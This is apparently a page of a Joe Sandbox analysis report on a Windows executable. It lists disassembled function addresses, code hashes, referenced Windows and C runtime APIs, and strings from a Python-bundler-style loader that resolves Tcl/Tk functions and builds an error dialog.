Opcode ID: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
Instruction ID: 26543a4b9b45c8d237e75dec72dd0557cd71f18e2a718f3018ae3879f573062d
Opcode Fuzzy Hash: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
Instruction Fuzzy Hash: 37718DA2E18EC581EA11CB2CD5452FDA360F7A9B5CF54E321DB8C52592FF28E2D9C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33C56C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33C594

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
Instruction ID: b50baf1c241324d7d097d41cbbd370113edee5622936f121a624e651444426c4
Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
Instruction Fuzzy Hash: 4841D072A08B4193FA34DB2AE640279F3A1EB5BFA1F141131D68EC3690EF2CE402C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3283F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction ID: af1a072ba8bbd46386be3409231d290dbd6d54c5a43d723c428e73d95df63d00
Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction Fuzzy Hash: AA418926D1DE8541EA119B34D5012FDA360FBAAB58F549232EF8D82193FF2CE5D8C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3282C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF61D32836A

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 514d917231b69e24eb94a28f6af1f2a08606151838e2f37d0c047eeab57b782d
Instruction ID: 85fb4243ed2095c81e3cf68c992dd8a83573673c912b046106d297b8ceaa6675
Opcode Fuzzy Hash: 514d917231b69e24eb94a28f6af1f2a08606151838e2f37d0c047eeab57b782d
Instruction Fuzzy Hash: F621A235F08A9295FA549A2269043BAE641BF46FE8F8C5430EE0D87786EE7DE501C240

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33BFFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33C082

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
Instruction ID: 5d8174890e54d2e927edb7d24380ddd69af5a34776da292737c3109950190444
Opcode Fuzzy Hash: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
Instruction Fuzzy Hash: B6318F32A18F92A5F751EF56894137CA660AF46FB1F410235EA1E873D2EE7CF4418711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D339FF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF61D33A01F

Part of subcall function 00007FF61D33A118: GetModuleHandleExW.KERNEL32 ref: 00007FF61D33A13D
Part of subcall function 00007FF61D33A118: GetProcAddress.KERNEL32 ref: 00007FF61D33A153
Part of subcall function 00007FF61D33A118: FreeLibrary.KERNEL32 ref: 00007FF61D33A17A

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction ID: 02eb5df9f98dbc7240c09b3d85dcbd613bf7dc9155c681c168fe40337ce487a3
Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction Fuzzy Hash: AF218C32E04B469AEB24CF64C5402ED73A0EB06B2CF44063AD62D87AD5EF38D586CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3365A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33650D

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: 45d4e6d63bba9f75d0e06d76f3c15b3b1984432e4a32b1e97163fed777d5c3da
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: 50118E71A1CF8195FE60DF519600279E2A0BF86FA0F444431EA8E8769AEF3CE440DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D346DAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D346DCF

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
Instruction ID: 10dded35c0460b402d63efefa43f610784be5ba9bd68dcadf2fcd1a578f99a9f
Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
Instruction Fuzzy Hash: 17219232A18E8186EB618F18D5407B9B7A0EB86F64F144234EA5D876D9EF3DD405CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3305FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D330650

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: b091766b62a2ed90454f679e68dc4f15ce31a391a6b8445813e0207d48fe01df
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: 3E01C031A08F5251EA04DF629A01069E691FF87FF0F088630EE6C97BDAEE3CE0118700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D337BB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D337BEE

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
Instruction ID: 9de8a864c9966369bd289388c279b2f74a19c3faf50b92848d2cd1df0318ba0e
Opcode Fuzzy Hash: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
Instruction Fuzzy Hash: BD014070E0DE4260FE66EB656B41179E1A0AF42FB0F144638E91EC26D6FE6CF8418700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33F258 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF61D33BAA6,?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02), ref: 00007FF61D33F2AD

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction ID: 73c862ca9200226f937220f8363b3aad05e7b6b833c7d381ecf99fe1a703184d
Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction Fuzzy Hash: 02F06D7EB09E06A1FE94D7A296112B9D7915F4BFA0F8C4430CD4EC63C2FE2DE8858610

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33DCBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF61D330E24,?,?,?,00007FF61D332336,?,?,?,?,?,00007FF61D333929), ref: 00007FF61D33DCFA

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction ID: aaf85de6a973e18f70cc666f4478941090432bdf5208206e59760a88d1f57d3f
Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction Fuzzy Hash: BCF05830B0AA4661FE54977ABA092B5E2905F86FB5F084630D82ECA2C1FE2DF4408210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D337EEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D337F05

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction ID: 03a5b40f1d35b6091e4aad92b13484c26819e879ccb0aac8e1333c1c10c3baa6
Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction Fuzzy Hash: 76E012F2E08F47A2FE16FAA04B825B991515F16F61F104430DA0ACA3C3FE1CF8499A61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF61D326F00 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF61D326F17
GetProcAddress.KERNEL32 ref: 00007FF61D326F56
GetProcAddress.KERNEL32 ref: 00007FF61D326F7B
GetProcAddress.KERNEL32 ref: 00007FF61D326FA0
GetProcAddress.KERNEL32 ref: 00007FF61D326FC8
GetProcAddress.KERNEL32 ref: 00007FF61D326FF0
GetProcAddress.KERNEL32 ref: 00007FF61D327018
GetProcAddress.KERNEL32 ref: 00007FF61D327040
GetProcAddress.KERNEL32 ref: 00007FF61D327068

Strings

Tcl_CreateThread, xrefs: 00007FF61D327036
Tcl_Init, xrefs: 00007FF61D326F10
Tk_GetNumMainWindows, xrefs: 00007FF61D3273CE
Tcl_ThreadQueueEvent, xrefs: 00007FF61D32714E
Failed to get address for Tcl_CreateThread, xrefs: 00007FF61D327052
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF61D32734A
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF61D327142
Tcl_CreateObjCommand, xrefs: 00007FF61D3271EE
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF61D32711A
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF61D3273EA
Tcl_MutexUnlock, xrefs: 00007FF61D3270AE
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF61D3270F2
Tcl_Free, xrefs: 00007FF61D32737E
Tcl_DeleteInterp, xrefs: 00007FF61D32700E
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF61D32720A
Tcl_EvalEx, xrefs: 00007FF61D327306
Tcl_ConditionWait, xrefs: 00007FF61D327126
Tcl_SetVar2Ex, xrefs: 00007FF61D32728E
Failed to get address for Tk_Init, xrefs: 00007FF61D3273C2
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF61D3272D2
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF61D32725A
Tcl_NewByteArrayObj, xrefs: 00007FF61D327266
Tcl_NewStringObj, xrefs: 00007FF61D32723E
Failed to get address for Tcl_GetString, xrefs: 00007FF61D327232
Tcl_SetVar2, xrefs: 00007FF61D3271C6
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF61D326F8D
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF61D326FB2
Tk_Init, xrefs: 00007FF61D3273A6
Tcl_GetString, xrefs: 00007FF61D327216
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF61D3272AA
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF61D327282
Tcl_GetCurrentThread, xrefs: 00007FF61D32705E
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF61D327192
Failed to get address for Tcl_EvalFile, xrefs: 00007FF61D3272FA
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF61D326F68
Failed to get address for Tcl_Alloc, xrefs: 00007FF61D327372
Tcl_Finalize, xrefs: 00007FF61D326FBE
Tcl_Alloc, xrefs: 00007FF61D327356
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF61D3270CA
Tcl_ThreadAlert, xrefs: 00007FF61D327176
Tcl_ConditionFinalize, xrefs: 00007FF61D3270D6
Tcl_EvalFile, xrefs: 00007FF61D3272DE
Failed to get address for Tcl_GetVar2, xrefs: 00007FF61D3271BA
Tcl_DoOneEvent, xrefs: 00007FF61D326F96
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF61D32702A
Tcl_FinalizeThread, xrefs: 00007FF61D326FE6
Failed to get address for Tcl_SetVar2, xrefs: 00007FF61D3271E2
Tcl_GetVar2, xrefs: 00007FF61D32719E
Tcl_ConditionNotify, xrefs: 00007FF61D3270FE
GetProcAddress, xrefs: 00007FF61D326F30
Failed to get address for Tcl_EvalEx, xrefs: 00007FF61D327322
Failed to get address for Tcl_MutexLock, xrefs: 00007FF61D3270A2
Failed to get address for Tcl_Init, xrefs: 00007FF61D326F29
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF61D32716A
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF61D32707A
Failed to get address for Tcl_Finalize, xrefs: 00007FF61D326FDA
Tcl_EvalObjv, xrefs: 00007FF61D32732E
Tcl_CreateInterp, xrefs: 00007FF61D326F4C
Failed to get address for Tcl_Free, xrefs: 00007FF61D32739A
Tcl_FindExecutable, xrefs: 00007FF61D326F71
Tcl_GetObjResult, xrefs: 00007FF61D3272B6
Tcl_MutexLock, xrefs: 00007FF61D327086
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF61D327002

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
Instruction ID: bfaab211570102cbb1d5fdf7eb899e74017691fc2b72c1e4c78893b90fb9c1f5
Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
Instruction Fuzzy Hash: 2DE1D274E2EF4391FE598B18B894174A3B1AF46FB4B985035C80E862A4FF7DB158D250

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D321F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF61D321F9E
MulDiv.KERNEL32 ref: 00007FF61D321FB2
MulDiv.KERNEL32 ref: 00007FF61D321FD3
SystemParametersInfoW.USER32 ref: 00007FF61D32201B
CreateFontIndirectW.GDI32 ref: 00007FF61D32202F
#380.COMCTL32 ref: 00007FF61D322053
CreateWindowExW.USER32 ref: 00007FF61D3220A6
CreateWindowExW.USER32 ref: 00007FF61D322100
CreateWindowExW.USER32 ref: 00007FF61D32215D
CreateWindowExW.USER32 ref: 00007FF61D3221BF
SendMessageW.USER32 ref: 00007FF61D3221DF
SendMessageW.USER32 ref: 00007FF61D3221F9
SendMessageW.USER32 ref: 00007FF61D322218
SendMessageW.USER32 ref: 00007FF61D322237
SendMessageW.USER32 ref: 00007FF61D322255
SendMessageW.USER32 ref: 00007FF61D322273
SendMessageW.USER32 ref: 00007FF61D322291
SendMessageW.USER32 ref: 00007FF61D3222A9
SendMessageW.USER32 ref: 00007FF61D3222C1
GetClientRect.USER32 ref: 00007FF61D3222D0

Part of subcall function 00007FF61D3223F0: GetDC.USER32 ref: 00007FF61D32241B
Part of subcall function 00007FF61D3223F0: SelectObject.GDI32 ref: 00007FF61D322462
Part of subcall function 00007FF61D3223F0: DrawTextW.USER32 ref: 00007FF61D322485
Part of subcall function 00007FF61D3223F0: SelectObject.GDI32 ref: 00007FF61D32249B
Part of subcall function 00007FF61D3223F0: ReleaseDC.USER32 ref: 00007FF61D3224AB
Part of subcall function 00007FF61D3223F0: MoveWindow.USER32 ref: 00007FF61D3224FB
Part of subcall function 00007FF61D3223F0: MoveWindow.USER32 ref: 00007FF61D32253B
Part of subcall function 00007FF61D3223F0: MoveWindow.USER32 ref: 00007FF61D32258E

Strings

STATIC, xrefs: 00007FF61D32205C, 00007FF61D3220B1
EDIT, xrefs: 00007FF61D32210B
Close, xrefs: 00007FF61D322168
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF61D321F7D
BUTTON, xrefs: 00007FF61D322176

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

